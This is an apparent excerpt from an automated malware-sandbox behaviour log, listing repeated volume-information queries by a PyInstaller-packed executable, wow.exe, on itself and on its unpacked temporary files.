                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\select.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\jaraco VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\jaraco VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\_hashlib.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\_ssl.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\jaraco\text\Lorem ipsum.txt VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\base_library.zip VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\win32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pywin32_system32 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyexpat.pyd VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\attrs-24.2.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\cryptography-43.0.3.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\pyreadline3-3.5.4.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\wheel-0.45.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI24882 VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\Desktop\wow.exeQueries volume information: C:\Users\user\Desktop\wow.exe VolumeInformationJump to behavior
